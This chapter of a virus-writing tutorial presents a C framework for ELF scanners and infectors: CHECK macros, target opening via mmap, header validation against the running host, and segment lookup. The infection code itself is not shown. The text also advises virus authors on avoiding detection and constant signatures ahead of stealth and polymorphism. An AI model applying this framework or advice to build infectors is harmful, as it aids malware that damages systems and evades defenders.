3. One step closer to the edge (i)

 

To take a significant step forward, you must make a series of finite improvements.

 Donald J. Atwood, General Motors

This chapter introduces a framework for scanners and first stage infectors, written in plain C. The code is split into many parts that manipulate a central data structure. The idea is to replace some of these parts in later chapters to implement improvements and different infection methods. Here you will find only the most basic parts shared by all programs. A few functions common to all infectors are in Scratch pad (i); the rest accompany descriptions of infection methods in separate chapters.

The code is not insertable itself. Doing it in C describes what would be necessary. In the meantime the infectors insert and activate one chunk of code, an array of bytes prepared by Dressing up binary code.

Target file names are specified through stdin, not as command line arguments. This is required to scan crowded places like /usr/bin in one go. Anyway, Scanners (i) check executables for irregular layout, not signatures.

Parts are shown in random order and without any #include statements or prototypes. Identifiers prefixed with TEVWH_ are defined in generated file config.h. See Verifying installed packages. If you need full details I can only recommend a look into the sources of this document. Mirrors shows where to get it.

This code really wants to be C++. Some hardware I'm working on is just too slow for big compilers, though. The heavy use of macros is a consequence of not using C++, not the reason.

3.1. print_errno

A simple replacement of perror(3). If the first argument is -1 instead of errno(3) the function works just like printf(3).
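
The source of print_errno is not reproduced in this chapter. As a rough sketch of the behaviour described above, assuming a printf-style signature with a leading error number and output on stdout (the return value is an addition made for illustration):

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/*
 * Sketch only; signature, return value and use of stdout are assumptions.
 * err == -1: behaves like printf(3).
 * otherwise: appends ": <strerror(err)>\n", similar to perror(3).
 * Returns the number of characters written, or a negative value on error.
 */
int print_errno(int err, const char* fmt, ...)
{
  va_list ap;
  int n;

  va_start(ap, fmt);
  n = vprintf(fmt, ap);
  va_end(ap);
  if (n < 0)
    return n;

  if (err != -1)
  {
    int m = printf(": %s\n", strerror(err));
    if (m < 0)
      return m;
    n += m;
  }
  return n;
}
```

A call like print_errno(errno, "open(%s)", name) would then report both the formatted text and the reason for the failure.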

3.2. Conditional output

printf(3) is a great debugging tool. I use it similarly to assert(3): a single pre-processor definition deactivates all calls, or rather groups of them. The conventional way to completely remove function calls through the pre-processor is to define a parameterized macro that evaluates to nothing. But printf takes a variable number of arguments, which such a macro cannot accept. The recent C99 standard provides a mechanism to handle this. The gcc extension for the same purpose is much older but different (pronounce as "incompatible").

I chose obscure syntax instead.
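
Judging from the description of CHECK further down, where a TRACE_ macro is expected to expand to either print_errno or (void), the trick is presumably a cast applied to a comma expression. A minimal sketch of that idea follows; the names trace_print, TRACE_ACTIVE, TRACE_SILENT and trace_demo are hypothetical and not taken from the framework.

```c
#include <stdarg.h>
#include <stdio.h>

static int trace_calls = 0; /* counts messages actually printed */

/* hypothetical stand-in for print_errno; ignores the error number */
static int trace_print(int err, const char* fmt, ...)
{
  va_list ap;
  int n;

  (void)err;
  trace_calls++;
  va_start(ap, fmt);
  n = vprintf(fmt, ap);
  va_end(ap);
  return n;
}

/* An active group names a function, a silent group names a cast. */
#define TRACE_ACTIVE trace_print
#define TRACE_SILENT (void)

/* returns the number of messages printed, which should be 1 */
int trace_demo(void)
{
  trace_calls = 0;
  TRACE_ACTIVE(-1, "visible %d\n", 1); /* trace_print(-1, "visible %d\n", 1) */
  TRACE_SILENT(-1, "hidden %d\n", 2);  /* (void)(-1, "hidden %d\n", 2) */
  return trace_calls;
}
```

The silenced call turns into a comma expression whose value is thrown away. Arguments with side effects are still evaluated, and a compiler may warn about operands without effect.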

3.3. trace_infector.h

3.4. trace_scanner.h

3.5. target.h

This is the central data structure used by all examples based on this framework. Not all struct members are used by all programs, though. And obviously scanners have no use for a byte array called infection.

3.6. check.h

None of these programs are ready for end-users. They are intended as a base for experiments and have a tendency to accumulate weird bugs. If everything is well, terse output is efficient. And when things get rough, exact details, including location in the source, are more important than nice presentation.

Macro CHECK evaluates an expression built from a relational operator and two operands. If this condition is false then a diagnostic message is written. The first argument of CHECK is prefixed with TRACE_ to build the name of the function that actually writes the message. Expected effective values are either print_errno or (void), just as defined by the TRACE_ macros in trace_infector.h.

The message itself consists of four lines, all prefixed with "CHECK:". First comes the name of the target file. This relies on having a variable t point to a structure of type Target. This is followed by the source file and the line number of the CHECK statement that failed. The third line is the source code of the condition. And the fourth line shows the actual values of the left and right operands, formatted both as %ld and %#lx. The operands are evaluated only once and then assigned to local variables of type long inside a separate block.

In the body of a macro the character # works as a "stringification" operator on macro arguments; it surrounds its operand with double quotes. Unfortunately # does not accept brackets around the operand. To maintain the precaution that arguments in macros are evaluated only inside brackets we need an intermediate macro, QUOTE_EXP.

The predefined macro __LINE__ evaluates to the current line number. Since # works only on macro arguments and not arbitrary definitions we need an intermediate macro again. Unfortunately a simple QUOTE_EXP(__LINE__) evaluates to "__LINE__". The intended result requires another level of mediation through QUOTE_NUM. It is not possible to stringify the value of symbols declared through enum or const int.

Source: src/one_step_closer/check.h
#define QUOTE_EXP(n)	#n
#define QUOTE_NUM(n)	QUOTE_EXP(n)

/* last parameter is called err; errno itself is usually a macro */
#define CHECK_BEGIN(trace, left, op, right, err) \
  { long _left = (left); long _right = (right); \
    if (!(_left op _right)) { \
      TRACE_##trace(err, \
      "CHECK: %s\n" \
      "CHECK: " __FILE__ "#" QUOTE_NUM(__LINE__) "\n" \
      "CHECK: (" QUOTE_EXP(left) ") " QUOTE_EXP(op) \
        " (" QUOTE_EXP(right) ")\n" \
      "CHECK: %ld " QUOTE_EXP(op) " %ld; %#lx " QUOTE_EXP(op) " %#lx\n", \
      t->src_file, _left, _right, _left, _right);
#define CHECK_END	} }

#define CHECK(trace, left, op, right) \
  CHECK_BEGIN(trace, left, op, right, -1) return false; CHECK_END

#define CHECK_ERRNO(left, op, right) \
  CHECK_BEGIN(ERROR, left, op, right, errno) return false; CHECK_END

/*
 * wrappers for write(2) and lseek(2) that handle errors
 * used only in infectors and only on fd_dst
 */ 
#define CHECK_WRITE(buf, count) \
  CHECK_BEGIN(INFECT, count, ==, write(t->fd_dst, buf, count), errno) \
  return false; CHECK_END
#define CHECK_LSEEK(offset, whence) \
  CHECK_BEGIN(INFECT, -1, !=, lseek(t->fd_dst, offset, whence), errno) \
  return false; CHECK_END

3.7. main

The differences between infectors and scanners show in target_action #1 and print_summary #1, but not in main. On success each implementation of action will output a single line per target. The file name used in that case is a bit simplified. If the value of environment variable TEVWH_TMP is the prefix of a target file name then this prefix is cut off from success reports. Anyway, this is relevant only to scanners.

Array stat is an ugly hack to gather arbitrary statistics without having to define a different interface for every program.

Source: src/one_step_closer/main.inc
int main(void)
{
  Target t;
  unsigned stat[5] = { 0 }; /* ugly hack to gather statistics */
  const char* tmp = getenv("TEVWH_TMP");
  size_t len_tmp = (tmp == 0) ? 0 : strlen(tmp);

  while(0 != fgets(t.src_file, sizeof(t.src_file), stdin))
  {
    size_t len = strlen(t.src_file);
    if (len <= 0)
      continue; /* ignore empty lines */

    /* check that all lines fit in buffer and are terminated with '\n' */
    if (t.src_file[len - 1] != '\n')
      return -1;
    t.src_file[len - 1] = 0; /* we don't need the '\n', though */

    t.clean_src = (len_tmp > 0 && 0 == memcmp(tmp, t.src_file, len_tmp))
    ? t.src_file + len_tmp + 1
    : t.src_file;

    stat[0]++; /* total number of files */
    if (target_open_src(&t) &&
        target_is_elf(&t) &&
        target_get_seg(&t) &&
        target_action(&t, stat))
    { stat[1]++; /* number of successful files */ }
    target_close(&t);
  }
  print_summary(stat);
  return 0;
}
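
The expression that sets clean_src skips the prefix plus one more character, presumably the '/' that separates directory and file name. A slightly more defensive variant could live in a helper of its own. This is only a sketch; strip_prefix is a hypothetical name, and the use of strncmp(3) and the explicit test for '/' are my choices, not the framework's.

```c
#include <string.h>

/*
 * Hypothetical helper: returns the part of name that follows "<prefix>/",
 * or name unchanged if it does not start with that prefix.
 * strncmp(3) stops at the end of a short name, memcmp(3) would not.
 */
const char* strip_prefix(const char* name, const char* prefix)
{
  size_t len = (prefix == 0) ? 0 : strlen(prefix);

  if (len > 0 && 0 == strncmp(prefix, name, len) && name[len] == '/')
    return name + len + 1;
  return name;
}
```

With a prefix of "/tmp/x" the name "/tmp/x/ls" is reported as "ls", while "/usr/bin/ls" is left alone.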

3.8. target_open_src

Modifying a file in place, as opposed to writing a copy, is possible but difficult. And between the first and the final modification the contents of the target are invalid. Imagine a worst-case scenario of a virus infecting /bin/sh being interrupted through a power failure (or an emergency shutdown by a hectic admin).

There are a few approaches to change a file while copying.

Using MAP_PRIVATE for argument flags of mmap(2) activates copy-on-write semantics. You can read and write as if you had chosen the read-in-one-go method, but the implementation is more efficient. Unmodified pages are loaded directly from the file. Under low-memory conditions these pages can be discarded without saving them in swap-space.

Source: src/one_step_closer/open_src.inc
bool target_open_src(Target* t)
{
  TRACE_DEBUG(-1, "target_open_src\n");

  /* target_close() needs a few clean values, initialize them first  */
  t->fd_dst = -1;
  t->image.v = 0;

  CHECK_ERRNO(0, <=, t->fd_src = open(t->src_file, O_RDONLY));
  CHECK_ERRNO((off_t)-1, !=, t->filesize = lseek(t->fd_src, 0, SEEK_END));

  CHECK(ERROR, t->filesize, >, sizeof(TEVWH_ELF_EHDR));
  t->aligned_filesize = ALIGN_UP(t->filesize);

  /* can't use CHECK for mmap since it returns void*, not int */
  t->image.v = mmap(0, t->filesize, PROT_READ | PROT_WRITE, MAP_PRIVATE,
    t->fd_src, 0);
  if (t->image.v != MAP_FAILED)
    return true;
  TRACE_ERROR(errno, "mmap(%s)", t->src_file);
  return false;
}
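
The copy-on-write behaviour of MAP_PRIVATE is easy to observe on a scratch file. The following sketch is independent of the framework; the function name and the temporary file template are arbitrary choices made for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Returns 1 if a write through a MAP_PRIVATE mapping left the file
 * untouched, 0 if the file changed, -1 on any error.
 */
int private_mapping_demo(void)
{
  char path[] = "/tmp/cow_demo_XXXXXX"; /* arbitrary scratch file */
  char on_disk = 0;
  char* map;
  int result = -1;
  int fd = mkstemp(path);

  if (fd < 0)
    return -1;
  unlink(path); /* the file lives on until fd is closed */

  if (write(fd, "hello", 5) == 5)
  {
    map = mmap(0, 5, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
    if (map != MAP_FAILED)
    {
      map[0] = 'J'; /* changes our private copy of the page only */
      if (map[0] == 'J' && pread(fd, &on_disk, 1, 0) == 1)
        result = (on_disk == 'h');
      munmap(map, 5);
    }
  }
  close(fd);
  return result;
}
```

The mapping shows the modified byte while a read from the descriptor still returns the original one.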

3.9. target_close

3.10. target_is_elf

A visible virus is a dead virus. Breaking things is quite the opposite of invisibility. So before you even think about polymorphism and stealth mechanisms you should make sure your code does nothing unexpected. On the other hand exhaustive checks of target files will severely increase code size. And verifying signatures and other constant values is likely to make the virus code itself a constant signature. A better approach is to compare the target with the host executable currently running the virus. SELF is defined in target.h.

Finding a meaningful set of tests is an art in itself. For example some executables of Red Hat 8.0 have an additional program header of type GNU_EH_FRAME. This means that e_phnum can differ between infector and target.

Source: src/one_step_closer/is_elf.inc
bool target_is_elf(Target* t)
{
  enum { CMP_SIZE = offsetof(TEVWH_ELF_EHDR, e_entry) };
  TEVWH_ELF_EHDR* ehdr = t->image.ehdr;

  TRACE_DEBUG(-1, "target_is_elf SELF=%p\n", SELF);

  CHECK(SCAN, 0, ==, memcmp(&ehdr->e_ident, &SELF->e_ident, CMP_SIZE));
  CHECK(SCAN, ehdr->e_phoff, ==, SELF->e_phoff);
  CHECK(SCAN, ehdr->e_ehsize, ==, SELF->e_ehsize);
  CHECK(SCAN, ehdr->e_phentsize, ==, SELF->e_phentsize);
  CHECK(SCAN, ehdr->e_shentsize, ==, SELF->e_shentsize);

  return true;
}
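
It may help to see which fields the first comparison covers. Everything in front of e_entry amounts to e_ident, e_type, e_machine and e_version. The sketch below assumes a Linux <elf.h> and lets Elf64_Ehdr stand in for TEVWH_ELF_EHDR; same_kind_of_elf is a hypothetical name.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Elf64_Ehdr stands in for TEVWH_ELF_EHDR; that is an assumption */
enum { CMP_SIZE = offsetof(Elf64_Ehdr, e_entry) };

/*
 * Returns 1 if both headers agree in all bytes in front of e_entry,
 * that is in e_ident (16 bytes), e_type (2), e_machine (2)
 * and e_version (4).
 */
int same_kind_of_elf(const Elf64_Ehdr* a, const Elf64_Ehdr* b)
{
  return 0 == memcmp(a, b, CMP_SIZE);
}
```

Two headers that differ only in e_entry compare equal, while a different e_machine is rejected.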

3.11. target_get_seg

Finding the code and data segments in a loop is really overkill. But this way we can do some general checks. See readelf & objdump for details.

Source: src/one_step_closer/get_seg.inc
bool target_get_seg(Target* t)
{
  TEVWH_ELF_PHDR* phdr;
  unsigned nr_load;
  unsigned nr;
  TEVWH_ELF_PHDR* phdr_data = 0; /* stays 0 if there is no PT_LOAD */
  TEVWH_ELF_PHDR* phdr_code;

  TRACE_DEBUG(-1, "target_get_seg\n");

  phdr = t->phdr = (TEVWH_ELF_PHDR*)(t->image.b + t->image.ehdr->e_phoff);
  nr_load = 0;
  t->phdr_dynamic = 0;
  for(nr = t->image.ehdr->e_phnum; nr > 0; nr--, phdr++)
  {
    switch(phdr->p_type)
    {
      case PT_LOAD: nr_load++; phdr_data = phdr; break;
      case PT_DYNAMIC: t->phdr_dynamic = phdr; break;
    }
  }

  CHECK(SCAN, nr_load, ==, 2);
  CHECK(SCAN, (long)phdr_data, !=, 0);

  /* both segments lie right next to each other */
  t->phdr_code = phdr_code = phdr_data - 1;
  CHECK(SCAN, phdr_data->p_type, ==, PT_LOAD);
  CHECK(SCAN, phdr_code->p_type, ==, PT_LOAD);

  /* a code segment with trailing 0-bytes makes no sense */
  CHECK(SCAN, phdr_code->p_filesz, ==, phdr_code->p_memsz);

  t->end_of_cs = phdr_code->p_offset + phdr_code->p_filesz;
  t->aligned_end_of_cs = ALIGN_UP(t->end_of_cs);

  return true;
}
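
The loop trusts e_phoff and e_phnum as found in the file. One more general check, which is not part of the original code, would be to verify that the program header table fits inside the mapped file before walking it. A sketch with a hypothetical function name and parameters:

```c
#include <stdint.h>

/*
 * Hypothetical helper: returns 1 if phnum entries of phentsize bytes,
 * starting at file offset phoff, lie completely inside a file of
 * filesize bytes. Division is used instead of multiplication to
 * avoid integer overflow on hostile values.
 */
int phdr_table_in_bounds(uint64_t filesize, uint64_t phoff,
  uint64_t phnum, uint64_t phentsize)
{
  if (phnum == 0 || phentsize == 0)
    return 0;
  if (phoff > filesize)
    return 0;
  return phnum <= (filesize - phoff) / phentsize;
}
```

In target_get_seg such a test could run before the first access through phdr, with the values taken from t->filesize and t->image.ehdr.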